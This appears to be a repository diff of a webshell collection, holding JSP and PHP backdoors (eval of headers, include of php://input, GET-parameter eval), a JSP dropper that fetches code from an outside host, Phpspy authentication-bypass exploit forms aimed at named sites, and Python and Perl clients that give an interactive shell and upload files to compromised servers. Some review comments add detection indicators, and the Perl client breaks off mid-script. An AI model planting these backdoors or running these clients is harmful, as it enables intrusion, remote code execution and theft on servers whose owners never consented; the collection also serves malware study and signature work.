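@@ -0,0 +1 @@
+<%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private String password="734303";//??¡¤????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#ffffff"><%String act="";String path=request.getParameter("path");String content=request.getParameter("content");String url=request.getRequestURI();String url2=request.getRealPath(request.getServletPath());try{act=request.getParameter("act").toString();}catch(Exception e){}if(request.getSession().getAttribute("hehe")!=null){if(request.getSession().getAttribute("hehe").toString().equals("hehe")){if (path!=null && !path.equals("") && content!=null && !content.equals("")){ try{ File newfile=new File(path); PrintWriter writer=new PrintWriter(newfile); writer.println(content); writer.close(); if (newfile.exists() && newfile.length()>0) { out.println("<font size=3 color=red>save ok!</font>"); }else{ out.println("<font size=3 color=red>save erry!</font>"); } }catch(Exception e) { e.printStackTrace(); }}out.println("<form action="+url+" method=post>");out.println("<font size=3><br></font><input type=text size=54 name='path'><br>");out.println("<font size=3 color=red>"+url2+"</font><br>");out.println("<textarea name='content' rows=15 cols=50></textarea><br>");out.println("<input type='submit' value='save!'>");out.println("</form>");}}else{out.println("<div align='center'><form action='?act=login' method='post'>");out.println("<input type='password' name='pass'/>");out.println("<input type='submit' name='update' class='unnamed1' value='Login' />");out.println("</form></div>");}if(act.equals("login")){ String pass=request.getParameter("pass"); if(pass.equals(password)) { session.setAttribute("hehe","hehe"); String uri=request.getRequestURI(); uri=uri.substring(uri.lastIndexOf("/")+1); response.sendRedirect(uri); }else {out.println("Error");out.println("<a href='javascript:history.go(-1)'><font color='red'>go back</font></a></div><br>"); } }%></body></html>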
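Review bot: The login secret is a string literal (`private String password="734303"`), and it is the only gate in front of the `new PrintWriter(newfile)` write of the request's `content` to the request's `path`. Because that literal is now published with the sample, anyone responding to an incident where this file turns up should assume access was not limited to whoever planted it. The sample would be more useful to defenders with a short header comment listing its stable strings for signature work, e.g. `<%-- indicators: session attribute "hehe", page title "hahahaha", form action "?act=login" --%>`. The whole page is a single line, so line-oriented scanners will report every match at line 1.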

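--- a/jsp/web02.jsp
+++ b/jsp/web02.jsp
@@ -0,0 +1 @@
+<%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.getRealPath("/")+request.getParameter("f");new File(t).getParentFile().mkdirs();if(request.getParameter("p")==null){DataInputStream i=new DataInputStream(((HttpURLConnection)(new URL("http://qztmi.cn/js/h.txt").openConnection())).getInputStream());DataOutputStream o=new DataOutputStream(new FileOutputStream(t));byte[] b=new byte[4096];int c=0;while((c=i.read(b))>0){o.write(b,0,c);}o.close();i.close();out.println("down-ok");response.setHeader("down-ok","1");}else{(new FileOutputStream(t)).write(request.getParameter("p").getBytes());out.println("upload-ok");}%>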
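Review bot: The download source `http://qztmi.cn/js/h.txt` is hard-coded and undocumented, and it is the only network indicator in this sample. When no `p` parameter is sent, the page fetches that URL and writes the response to `request.getRealPath("/")` joined with the `f` parameter; with `p` present it writes the parameter's bytes to the same location, in both cases without authentication or any check on `f`. On a host this shows up as an outbound HTTP request from the application server followed by a new file under the web root, and as the response header `down-ok` or the bodies `down-ok`/`upload-ok`. I would record that in a header comment, with the host written defanged, e.g. `<%-- sample: dropper; indicators: outbound GET to qztmi[.]cn/js/h.txt, response header "down-ok" --%>`.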


@ -0,0 +1,28 @@
Phpspy 2010 身份验证绕过漏洞
作者:我不知道该唱什么 发布时间April 17, 2011 00:21:28 分类tech
利用代码:
<form method="POST" action="http://mirc.3est.com/1.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="submit" value="Login">
</form>
在每次向shell请求数据的时候 都附加post一个admin['pass']即可。
形成原因:
2009不存在该洞仅限2010版本对比二者即可得到答案
利用
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
对变量$admin['pass']进行覆盖。


@ -0,0 +1,43 @@
Phpspy 2011 继续身份验证绕过漏洞
作者:我不知道该唱什么 发布时间May 1, 2011 14:58:54 分类tech
官方目前下载已经修补上了 目前官方下载是2011.php 文件名为2011ok.php的是带洞版本。
鄙视转载不留版权的特别鄙视下那个什么hack情
http://hi.baidu.com/5427518 / http://www.hackqing.com/
我曾经还以为他是个人物。
今天m0r5和我说phpspy2011 我都不知道2011出来了 - - 就下下来看看
发现2011有不少借鉴WSO Shell的地方看到$pass还是在那个函数的上面但是验证成功过后用了一个Location重定向了一下之后会再次检查一次cookies。
但是想不明白作者为什么这样做和2010的原理一样一样绕过
下面给出一个更为直接的利用方法上传你自己的新shell
<form method="POST" action="http://www.hackshell.net/2011ok11.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="login">
<input type="submit" value="Login"></form>
点击Login这步点登录后 是登录界面 继续操作下一步:
<form method="POST" action="http://www.hackshell.net/2011ok.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
然后访问:
<form action="http://www.hackshell.net/2011ok.php" method="POST" enctype="multipart/form-data">
<input name="password" type="password" size="20">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input name="uploadfile" value="" type="file">
<input name="doupfile" value="Upload" type="submit">
<input name="uploaddir" value="D:/workspace/" type="hidden">
<input name="dir" value="D:/workspace/" type="hidden">
</form>
其中把iploaddir的value改为phpinfo中看到的路径上传shell。

41
php/php-sh/client.py Normal file

@ -0,0 +1,41 @@
#!/usr/bin/python
# Client for the backdoor which
# uses HTTP CODE header for inserting code
# Got the idea after seeing this sort of payload
# dropped by a phpmyadmin exploit on rdot :)
# Is also good to learn how to use urllib
# and not be lazy arse with requests all of time!
# Insecurety Research (2013) - insecurety.net
import urllib2
import sys
def usage(program):
print "HTTP CODE Header Backdoor Command Shell"
print "Usage: %s <Backdoor URL>" %(program)
print "Example: %s http://www.test.com/webshell.php" %(program)
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
print "[+] Using %s as target" %(args[1])
print "[!] Popping a shell, type 'exit' to quit"
while True:
opener = urllib2.build_opener()
url = args[1]
cmd = raw_input('~$ ')
if cmd == "exit":
sys.exit(0)
else:
code = "system('%s');" %(cmd)
opener.addheaders.append(('Code', code))# %(str(code))
urllib2.install_opener(opener)
result = urllib2.urlopen(url).read()
print result
except Exception, e:
print e
if __name__ == "__main__":
main(sys.argv)

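--- /dev/null
+++ b/php/php-sh/server.php
@@ -0,0 +1,3 @@
+<?php
+eval(getenv('HTTP_CODE'));
+?>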
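Review bot: server.php carries no comment saying what it is or what to look for, which a sample kept for detection work should have. Its single statement passes the `HTTP_CODE` environment value, which the paired client.py fills through a request header named `Code`, straight to `eval()`, so the payload travels in a header and would not appear in an access log that records only the request line. I would add above the statement: `// Sample: eval() of the request's Code header (HTTP_CODE); match eval(getenv('HTTP_ in files and log or inspect the Code header.`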

53
php/phpkit-0.1a/README Normal file

@ -0,0 +1,53 @@
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
phpkit-0.1a
Stealth PHP Backdooring Utility - Insecurety Research 2013
This is a simple kit to demonstrate a very effective way of
backdooring a webserver running PHP.
Essentially, it functions by parsing out any valid PHP code
from raw HTTP POST data sent to it, and executing said PHP.
No eval() or other suspect calls are in the serverside script,
the code is executed by the include() function. The php://input
data stream (which is basically "anything sent via raw POST) is
used to "capture" the raw POST data, and when parsed by include()
the code sent is executed.
This allows for many things to be done, i.e. executing any PHP
code you happen to write. The example client, phpkit.py, simply
gives a "shell prompt" (non interactive, each command is executed
in a new "context") on the victim server. It is trivial to write
pretty much anything, I have also written "upload.py" which will
be ready for the next release, which allows uploading arbritary
files to the infected webserver.
USAGE:
You upload "odd.php" to the target webserver by any means necessary.
You then run ./phpkit.py <url to php file on server> and enjoy!
Example Use:
[infodox@sphynx:~/phpkit-0.1a]$ ./phpkit.py http://localhost/odd.php
[+] URL in use: http://localhost/odd.php
shell:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell:~$ uname -a
Linux yore-ma 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
shell:~$
Questions, comments, bug reports and abuse? infodox () insecurety.net
Licence: The do whatever you want with it, just don't rip code without
giving credit licence.

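--- /dev/null
+++ b/php/phpkit-0.1a/odd.php
@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>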
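Review bot: The inline comment `// No eval() calls, no system() calls, nothing normally seen as malicious.` misleads anyone triaging this sample, because `include('php://input')` is itself the indicator: it runs the raw request body as PHP. The five `//` lines above `<?php` sit outside the PHP tags and are served as plain text, so a response body containing `php://input based backdoor` identifies this variant; php/phpkit-0.2a/odd.php is identical, and php/phpkit-1.0/odd.php keeps the same include without those lines. I would replace the comment with `// Indicator: include() of php://input runs the request body as PHP; needs allow_url_include enabled.` Whether the `ini_set` line can enable that setting at runtime depends on the server configuration, as the README's notes say, so keeping `allow_url_include` off in php.ini is the relevant hardening.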

28
php/phpkit-0.1a/phpkit.py Normal file

@ -0,0 +1,28 @@
#!/usr/bin/python
# Client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twitter: @info_dox
# Insecurety Research - 2013
import requests
import sys
if (len(sys.argv) != 2):
print "Usage: " + sys.argv[0] + " <url of backdoor>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
sys.exit(0)
url = sys.argv[1]
print "\n[+] URL in use: %s \n" %(url)
while True:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
payload = """<?php system('%s'); ?>""" %(cmd)
hax = requests.post(url, payload)
print hax.text

10
php/phpkit-0.2a/CHANGELOG Normal file

@ -0,0 +1,10 @@
Changelog of phpkit development
--
0.1a - 07/01 (Jan)/2013 - Initial Commit
0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru()
Uses simple logic to choose the first one that works.
Needs code cleanup soon, and implementation of exec() :)
0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit.
Preparing for the 0.2a release by finishing the upload client and writing
documentation for it. Code is a lot cleaner now though. Still need to fix
the bloody "test" function :/

100
php/phpkit-0.2a/README Normal file

@ -0,0 +1,100 @@
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
phpkit-0.2a
Stealth PHP Backdooring Utility - Insecurety Research 2013
This is a simple kit to demonstrate a very effective way of
backdooring a webserver running PHP.
Essentially, it functions by parsing out any valid PHP code
from raw HTTP POST data sent to it, and executing said PHP.
No eval() or other suspect calls are in the serverside script,
the code is executed by the include() function. The php://input
data stream (which is basically "anything sent via raw POST) is
used to "capture" the raw POST data, and when parsed by include()
the code sent is executed.
This allows for many things to be done, i.e. executing any PHP
code you happen to write. The example client, phpkit.py, simply
gives a "shell prompt" (non interactive, each command is executed
in a new "context") on the victim server. It is trivial to write
pretty much anything.
This release includes a massively overhauled backdoor client, it
tests various execution functions against the victim host before
using whatever one works first. It is massively ugly code, but
I intend to clean it up soonish.
This release also includes a basic file uploader :)
USAGE (backdoor part):
You upload "odd.php" to the target webserver by any means necessary.
You then run ./phpkit.py <url to php file on server> and enjoy!
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkit.py http://localhost/odd.php
[+] URL in use: http://localhost/odd.php
[+] Testing system function
[+] system() function works
shell:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell:~$ uname -a
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
USAGE (file uploader part):
This assumes "odd.php" is loaded onto the victim webserver, obviously.
You run ./upload.py <url to odd.php> <file to upload> <remote path>
Only works if remote path is writeable. /tmp/ is always good :)
Example Use:
[infodox@sahara:~/phpkit]$ python upload.py http://localhost/odd.php /etc/passwd /tmp/pass
[+] Uploading File
[+] Upload should be complete
So the file uploaded, now I compare MD5sums to check did it bloody well work!
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
2568416e280af88f82e982efd46525a8 /etc/passwd
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
2568416e280af88f82e982efd46525a8 /tmp/pass
Seems legit bro ;)
TODO:
MySQL client.
Notes:
In two use-cases this was shown to not function.
Use Case A: Servers with the Suhosin PHP Hardening Patches.
In this case, php://input and other URL inclusion vectors are rendered
unuseable due to the protections the Suhosin patches offer. i.e. this
tool don't work against Suhosin patched boxes.
Use Case B: Servers where php.ini is dictated by httpd.conf
In several cases where the php.ini is specific to the HTTP daemon,
runtime ini directive modification is not permissable. I have
personally observed this behaviour on Apache thus far, however
further testing/research is needed to find a workaround of some kind.
Please report if you have any issues getting this to work. Please
test it on a server with allow_url_include = On , then if it works,
set allow_url_include = Off , restart httpd, and check does it work.
If it does not work, please report using the issue tracker at
http://code.google.com/p/insecurety-research providing details of HTTPD
configuration so I can attempt to figure out new things :)
Questions, comments, bug reports and abuse? infodox () insecurety.net
Licence: The do whatever you want with it, just don't rip code without
giving credit licence.

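--- /dev/null
+++ b/php/phpkit-0.2a/odd.php
@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>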

106
php/phpkit-0.2a/phpkit.py Normal file

@ -0,0 +1,106 @@
#!/usr/bin/python
# Client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
if (len(sys.argv) != 2):
print "Usage: " + sys.argv[0] + " <url of backdoor>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
sys.exit(0)
url = sys.argv[1]
tester = """echo w00tw00tw00t"""
testkey = """w00tw00tw00t"""
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
if func == "system":
rawphp = """system('%s');""" %(cmd)
elif func == "shellexec":
rawphp = """echo shell_exec('%s');""" %(cmd)
elif func == "passthru":
rawphp = """passthru('%s');""" %(cmd)
elif func == "exec":
rawphp = """echo exec('%s');""" %(cmd)
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
### ###
# End of functions and object oriented stuff #
### ###
# the main body
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
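Review bot: `genphp` has no docstring describing the request it builds, and that wire format is what a detection rule for this kit keys on. Every request is a raw POST body of the form `<?php eval(base64_decode('…')); ?>`, and `test` first sends probes whose decoded payload runs `echo w00tw00tw00t`, then looks for `w00tw00tw00t` in the response. I would add under the `def genphp` line: `# Wire format: raw POST body "<?php eval(base64_decode('<b64>')); ?>"; probes echo w00tw00tw00t.` The same function appears unchanged in php/phpkit-1.0/phpkitcli.py.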

34
php/phpkit-0.2a/upload.py Normal file

@ -0,0 +1,34 @@
#!/usr/bin/python
# Upload.py
# File Upload client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
if (len(sys.argv) != 4):
print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
sys.exit(0)
url = sys.argv[1]
localfile = sys.argv[2]
remotefile = sys.argv[3]
f = open(localfile, "r")
rawfiledata = f.read()
encodedfiledata = rawfiledata.encode('base64')
phppayload = """<?php
$f = fopen("%s", "a");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
print "[+] Uploading File"
requests.post(url, phppayload) # this is why I love the python requests library
print "[+] Upload should be complete"

97
php/phpkit-1.0/README.txt Normal file

@ -0,0 +1,97 @@
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
phpkit-1.0
Stealth PHP Backdooring Utility - Insecurety Research 2013
This is a simple kit to demonstrate a very effective way of
backdooring a webserver running PHP.
Essentially, it functions by parsing out any valid PHP code
from raw HTTP POST data sent to it, and executing said PHP.
No eval() or other suspect calls are in the serverside script,
the code is executed by the include() function. The php://input
data stream (which is basically "anything sent via raw POST) is
used to "capture" the raw POST data, and when parsed by include()
the code sent is executed.
This allows for many things to be done, i.e. executing any PHP
code you happen to write. The example client, phpkitcli.py, offers
file upload and a remote shell.
This release includes a massively overhauled backdoor client, it
tests various execution functions against the victim host before
using whatever one works first. It is massively ugly code, but
I intend to clean it up soonish.
USAGE (backdoor part):
You upload "odd.php" to the target webserver by any means necessary.
You then run ./phpkitcli.py --url <url to php file on server> and enjoy!
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php
[+] URL in use: http://localhost/odd.php
[+] Testing system function
[+] system() function works
shell:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell:~$ uname -a
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
USAGE (file uploader part):
This assumes "odd.php" is loaded onto the victim webserver, obviously.
You run:
./phpkitcli.py --url <url to odd.php> --lfile <file to upload> --rfile <remote path> --mode UPLOAD
Only works if remote path is writeable. /tmp/ is always good :)
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php --mode UPLOAD --lfile /etc/passwd --rfile /tmp/pass
[+] Uploading File
[+] Upload should be complete
So the file uploaded, now I compare MD5sums to check did it bloody well work!
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
2568416e280af88f82e982efd46525a8 /etc/passwd
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
2568416e280af88f82e982efd46525a8 /tmp/pass
Seems legit bro ;)
TODO:
MySQL client.
Notes:
In two use-cases this was shown to not function.
Use Case A: Servers with the Suhosin PHP Hardening Patches.
In this case, php://input and other URL inclusion vectors are rendered
unuseable due to the protections the Suhosin patches offer. i.e. this
tool don't work against Suhosin patched boxes.
Use Case B: Servers where php.ini is dictated by httpd.conf
In several cases where the php.ini is specific to the HTTP daemon,
runtime ini directive modification is not permissable. I have
personally observed this behaviour on Apache thus far, however
further testing/research is needed to find a workaround of some kind.
Please report if you have any issues getting this to work. Please
test it on a server with allow_url_include = On , then if it works,
set allow_url_include = Off , restart httpd, and check does it work.
If it does not work, please report using the issue tracker at
http://code.google.com/p/insecurety-research providing details of HTTPD
configuration so I can attempt to figure out new things :)
Questions, comments, bug reports and abuse? infodox () insecurety.net
Licence: The do whatever you want with it, just don't rip code without
giving credit licence.

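--- /dev/null
+++ b/php/phpkit-1.0/odd.php
@@ -0,0 +1,5 @@
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>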

132
php/phpkit-1.0/phpkitcli.py Normal file

@ -0,0 +1,132 @@
#!/usr/bin/python
import argparse
import requests
import sys
help = """Connects to a phpkit backdoor and provides file upload or shell access"""
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--url", help="URL of backdoor", required=True)
parser.add_argument("--mode", help="UPLOAD or SHELL", default="SHELL")
parser.add_argument("--lfile", help="File to Upload (full path)")
parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
args = parser.parse_args()
url = args.url
mode = args.mode
localfile = args.lfile
remotefile = args.rfile
tester = """echo w00tw00tw00t"""
testkey = """w00tw00tw00t"""
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
if func == "system":
rawphp = """system('%s');""" %(cmd)
elif func == "shellexec":
rawphp = """echo shell_exec('%s');""" %(cmd)
elif func == "passthru":
rawphp = """passthru('%s');""" %(cmd)
elif func == "exec":
rawphp = """echo exec('%s');""" %(cmd)
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
###
def shell(func):
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
def upload(url, localfile, remotefile):
f = open(localfile, "r")
rawfiledata = f.read()
encodedfiledata = rawfiledata.encode('base64')
phppayload = """<?php
$f = fopen("%s", "a");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
print "[+] Uploading File"
requests.post(url, phppayload) # this is why I love the python requests library
print "[+] Upload should be complete"
sys.exit(0)
def main(url, localfile, remotefile, mode):
if mode == "UPLOAD":
upload(url, localfile, remotefile)
elif mode == "SHELL":
func = test(url, test, testkey)
shell(func)
else:
print "[-] Mode Invalid... Exit!"
sys.exit(0)
main(url, localfile, remotefile, mode)

7
php/wsb/ReadMe.txt Normal file

@ -0,0 +1,7 @@
#Web Shell BackDoor
For using this tool you must follow this steps :
1- Upload the php Agent (idc.php) into server
2- Run the perl script (wsb.pl) on your machine
3- Give the address of the agent to the perl script
4- Using this username and password : user :root , pass : toor
5- Enter Your Commands;)

7
php/wsb/idc.php Normal file

@ -0,0 +1,7 @@
<?php
$user="63a9f0ea7bb98050796b649e85481845"; #root
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
{eval($_GET['idc']);}
?>
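Review bot: Nothing in idc.php records its request shape, which is the useful part for anyone hunting it. The gate reads `usr`, `pass` and `idc` from `$_GET` and passes `idc` to `eval()`, so the credentials and the payload all sit in the query string and land in ordinary access logs; the paired wsb.pl probes with `echo www.idc-team.net`. The two MD5 strings are static (the trailing comments give their plaintexts) and work as file-content signatures. I would add above the `if`: `# Indicator: GET usr/pass/idc, idc is eval()'d; the query string exposes both the password and the code.`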

109
php/wsb/wsb.pl Normal file

@ -0,0 +1,109 @@
#IDC php BackDoor
#Iranian Dark Coders Team
#WwW.IDC-TeaM.NeT
#Coded BY M.R.S.CO
#We Are M.R.S.CO,N3O,UB313,Black.Hack3r
#Friends : G3n3Rall,MR.CILILI,BlacK.King,Nafsh,b3hz4d,E2MA3N,Skote_Vahshat,Bl4ck.Viper,Mr.Xpr
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print q (
__ __ __
| | _|_ {_ |_ _|| |__} _ _| | \ _ _ _
|/\|{-|_} __}| }{-|| |__}{_|{_|{|__/{_}{_}|
--=[Web Shell BackDoor]
+---++---==[Version : 1.1]
+---++---==[Coded by : M.R.S.CO]
+---++---==[WwW.IDC-TeaM.Net]
--=[Iranian Dark Coders Team]
);
use LWP::Simple;
print "\nEnter Shell URL : ";
chomp($url=<STDIN>);
print "\nEnter UserName : ";
chomp($usr=<STDIN>);
print "Enter PassWord : ";
chomp($pass=<STDIN>);
print "\nStart analyze shell\n";
@fun=("system","passthru","exec","shell_exec");
$tf="false";
foreach(@fun)
{
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('echo www.idc-team.net');";
if ($source =~ m/idc-team/i){
print "\nConected\nFor more information Enter \"help\"";
do {
print "\nWSB : ";
chomp($cmd=<STDIN>);
if ($cmd=~"help")
{
print q (
================================================================
command Description
------- --------------------------
help The help command display the help menu
getuid The 'getuid' command will display the user
lpwd display the filename of the current working directory
ps The 'ps' command display the list of running processes.
shell It display the standard shell
dir The 'dir' command List information about the FILEs
download The 'download' command downloads a file from the remote machine
sym The 'sym' command create a symlink
);
}elsif ($cmd=~"getuid"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('id');";
print "\nUser id = $source";
}elsif ($cmd=~"dir"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ls -la');";
print "\n $source";
}elsif ($cmd=~"lpwd"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('pwd');";
print "\n$source";
}elsif ($cmd=~"ps"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ps -A');";
print "\n$source";
}elsif ($cmd=~"exit"){
exit 0;
}elsif ($cmd=~"sym"){
print "Enter Target Path (/home/idc/public_html/config.php)\nEnter Target Path : ";
chomp($target=<STDIN>);
print "\nEnter symlink Path (/home/me/public_html/sym.txt)\nEnter symlink Path : ";
chomp($sym=<STDIN>);
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ln -s $target $sym');";
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\'perl -e \"symlink('$target','$sym')\"\');";
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=symlink('$target','$sym');";
print "\nSymlink \"$sym\" Was Created;)\n";
}elsif ($cmd=~"download"){
print "Enter File Path (/home/idc/public_html/test.zip)\nEnter File Path : ";
chomp($ff=<STDIN>);
print "\nEnter Save Path : ";
